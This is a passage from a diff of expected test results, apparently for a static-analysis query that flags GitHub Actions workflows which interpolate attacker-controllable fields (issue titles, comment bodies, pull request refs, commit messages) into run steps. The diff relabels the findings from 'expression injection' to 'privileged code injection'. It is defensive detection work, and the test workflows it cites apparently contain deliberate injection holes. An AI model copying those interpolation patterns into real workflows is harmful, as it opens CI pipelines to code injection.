github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | github.event.workflow_run.head_commit.author.name | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | github.event.workflow_run.head_commit.committer.email | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | github.event.workflow_run.head_commit.committer.name | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | github.event.workflow_run.head_branch | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | github.event.workflow_run.head_repository.description | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| 